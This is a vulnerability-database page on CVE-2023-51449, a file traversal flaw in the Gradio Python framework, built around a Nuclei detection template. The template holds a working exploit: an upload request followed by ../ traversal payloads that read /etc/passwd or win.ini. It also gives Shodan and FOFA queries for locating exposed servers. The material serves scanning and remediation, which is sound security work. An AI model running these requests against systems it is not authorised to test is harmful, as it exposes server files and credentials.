| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| CVE-2023-51449 | 22 Dec 202322:22 | – | circl | |
| Gradio Path Traversal Vulnerability | 22 Dec 202300:00 | – | cnnvd | |
| CVE-2023-51449 | 22 Dec 202320:58 | – | cve | |
| CVE-2023-51449 Make the `/file` secure against file traversal attacks | 22 Dec 202320:58 | – | cvelist | |
| Gradio makes the `/file` secure against file traversal and server-side request forgery attacks | 21 Dec 202318:24 | – | github | |
| Chuanhu Chat - Directory Traversal | 5 Jul 202603:01 | – | nuclei | |
| CVE-2023-51449 | 22 Dec 202321:15 | – | nvd | |
| CVE-2023-51449 Make the `/file` secure against file traversal attacks | 22 Dec 202320:58 | – | osv | |
| GHSA-6QM2-WPXQ-7QH2 Gradio makes the `/file` secure against file traversal and server-side request forgery attacks | 21 Dec 202318:24 | – | osv | |
| PYSEC-2023-249 | 22 Dec 202321:15 | – | osv |
id: CVE-2023-51449
info:
name: Gradio Hugging Face - Local File Inclusion
author: nvn1729
severity: high
description: |
Gradio LFI when auth is not enabled, affects versions 4.0 - 4.10, also works against Gradio < 3.33
impact: |
Unauthenticated attackers can read arbitrary files from the server when authentication is not enabled, potentially exposing sensitive configuration files and credentials.
remediation: |
Upgrade Gradio to version 3.33 or later (for Gradio < 3.x) or to version 4.11 or later (for Gradio 4.x).
reference:
- https://www.horizon3.ai/attack-research/disclosures/exploiting-file-read-vulnerabilities-in-gradio-to-steal-secrets-from-hugging-face-spaces/
- https://github.com/gradio-app/gradio/security/advisories/GHSA-6qm2-wpxq-7qh2
- https://nvd.nist.gov/vuln/detail/CVE-2023-51449
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-51449
cwe-id: CWE-22
epss-score: 0.0228
epss-percentile: 0.81028
cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:*
metadata:
verified: true
max-request: 2
vendor: gradio_project
product: gradio
framework: python
shodan-query: html:"__gradio_mode__"
fofa-query: body="__gradio_mode__"
tags: cve,cve2023,lfi,gradio,unauth,intrusive,vuln
variables:
str: '{{rand_base(8)}}'
http:
- raw:
- |
POST /upload HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311
-----------------------------250033711231076532771336998311
Content-Disposition: form-data; name="files";filename="okmijnuhbygv"
Content-Type: application/octet-stream
{{str}}
-----------------------------250033711231076532771336998311--
- |
GET /file={{download_path}}{{path}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: download_path
internal: true
group: 1
regex:
- "\\[\"(.+)okmijnuhbygv\"\\]"
payloads:
path:
- ..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
- ../../../../../../../../../../../../../../../etc/passwd
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition: or
- type: word
part: content_type
words:
- "text/plain"
- type: status
status:
- 200
# digest: 4b0a00483046022100f0b5f55dbca252013c0bdde0038aa93a683f03fbf372e9f5c4a3ba553eea6337022100c0e4609c6a4e42b75d69c021049e2534ec26804f607f9b798f80207ac9ee08de:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation